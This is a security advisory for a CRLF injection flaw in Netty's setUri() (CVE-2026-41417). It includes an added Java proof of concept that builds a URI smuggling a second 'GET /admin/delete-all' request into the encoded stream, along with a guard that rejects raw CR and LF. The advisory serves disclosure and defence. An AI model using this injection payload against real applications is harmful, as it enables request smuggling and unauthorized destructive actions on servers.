CRLF injection in Netty - CVE-2026-41417


Published: May 5, 2026


Vulnerability identifier: #VU130216
CSH Severity: Medium
CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Green
CVE-ID: CVE-2026-41417
CWE-ID: CWE-93
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vulnerable software:
Netty
Software vendor:
Netty project

Description

The vulnerability allows a remote attacker to inject additional HTTP or RTSP requests.

The vulnerability exists due to improper neutralization of CRLF sequences in DefaultHttpRequest.setUri() and DefaultFullHttpRequest.setUri(): a URI set through these methods is written into the request line as-is when the message is serialized by HttpRequestEncoder or RtspEncoder. A remote attacker who controls such a URI can embed CRLF sequences in it to inject additional HTTP or RTSP requests into the outgoing stream.

Exploitation requires an application to first create the request object, later replace its URI through setUri() with attacker-controlled data, and then serialize the request with HttpRequestEncoder or RtspEncoder.
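The following is an added example, not code from the advisory or from the Netty project. It drives the path described above on an affected Netty release: a request object is created, its URI is replaced through setUri() with a constructed attacker-controlled value containing CRLF sequences, and the request is serialized with HttpRequestEncoder through an EmbeddedChannel so the exact wire bytes can be inspected. It then shows the application-side guard (rejecting any raw CR or LF before the value reaches setUri()) that closes the path independently of the library fix. The same applies to DefaultFullHttpRequest and RtspEncoder per the advisory; only DefaultHttpRequest and HttpRequestEncoder are exercised here. The class and method names, the sample payload and the dependency coordinates (io.netty:netty-codec-http, io.netty:netty-transport) are assumptions of this example.

```java
import io.netty.buffer.ByteBuf;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.http.DefaultHttpRequest;
import io.netty.handler.codec.http.HttpHeaderNames;
import io.netty.handler.codec.http.HttpMethod;
import io.netty.handler.codec.http.HttpRequest;
import io.netty.handler.codec.http.HttpRequestEncoder;
import io.netty.handler.codec.http.HttpVersion;
import io.netty.util.CharsetUtil;

/**
 * Added example (not from the advisory or the Netty project): runs an
 * attacker-controlled URI through setUri() + HttpRequestEncoder on an
 * affected Netty release and shows the resulting wire bytes, then the
 * guard an application can apply before calling setUri().
 * Assumed dependencies: io.netty:netty-codec-http, io.netty:netty-transport.
 */
public class SetUriCrlfDemo {

    /** Serialize one request through HttpRequestEncoder and return the raw wire bytes as ASCII. */
    static String encode(HttpRequest request) {
        EmbeddedChannel ch = new EmbeddedChannel(new HttpRequestEncoder());
        try {
            if (!ch.writeOutbound(request)) {
                throw new IllegalStateException("encoder produced no output");
            }
            StringBuilder wire = new StringBuilder();
            ByteBuf buf;
            while ((buf = ch.readOutbound()) != null) {
                wire.append(buf.toString(CharsetUtil.US_ASCII));
                buf.release();
            }
            return wire.toString();
        } finally {
            ch.finishAndReleaseAll();
        }
    }

    /** Number of HTTP/1.1 request lines ("METHOD target HTTP/1.1") a downstream parser would see. */
    static int countRequestLines(String wire) {
        int n = 0;
        for (String line : wire.split("\r\n")) {
            if (line.matches("[A-Z]+ \\S+ HTTP/1\\.1")) {
                n++;
            }
        }
        return n;
    }

    /** Application-side guard: refuse any URI carrying a raw CR or LF before it reaches setUri(). */
    static String requireNoCrlf(String uri) {
        for (int i = 0; i < uri.length(); i++) {
            char c = uri.charAt(i);
            if (c == '\r' || c == '\n') {
                throw new IllegalArgumentException("raw CR/LF in URI at index " + i);
            }
        }
        return uri;
    }

    public static void main(String[] args) {
        // Constructed attacker input (hypothetical). The encoder appends " HTTP/1.1\r\n"
        // and the request's own headers after the URI, so the payload ends with a
        // dangling header name that turns that tail into a harmless header of the
        // injected second request instead of a parse error.
        String attackerUri = "/search?q=x HTTP/1.1\r\n"
                + "Host: target\r\n"
                + "\r\n"
                + "GET /admin/delete-all HTTP/1.1\r\n"
                + "Host: target\r\n"
                + "X-Ignore:";

        // Vulnerable path named in the advisory: construct, then mutate via setUri(), then encode.
        HttpRequest req = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, "/placeholder");
        req.headers().set(HttpHeaderNames.HOST, "target");
        req.setUri(attackerUri);

        String wire = encode(req);
        System.out.println(wire.replace("\r\n", "\\r\\n\n"));
        System.out.println("request lines on the wire: " + countRequestLines(wire));

        // Hardened form: validate the attacker-controlled value before it can reach setUri().
        HttpRequest safe = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, "/placeholder");
        try {
            safe.setUri(requireNoCrlf(attackerUri));
        } catch (IllegalArgumentException e) {
            System.out.println("rejected before encoding: " + e.getMessage());
        }
    }
}
```

On an affected release the printed bytes carry a second complete request line for /admin/delete-all, which is what a server or proxy reading the stream will act on; the guard rejects the value before setUri() is ever called. The guard checks only raw CR and LF: percent-encoded %0D%0A in a URI is not a line terminator on the wire and does not split the request line.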


Remediation

Install the security update from the vendor's website.
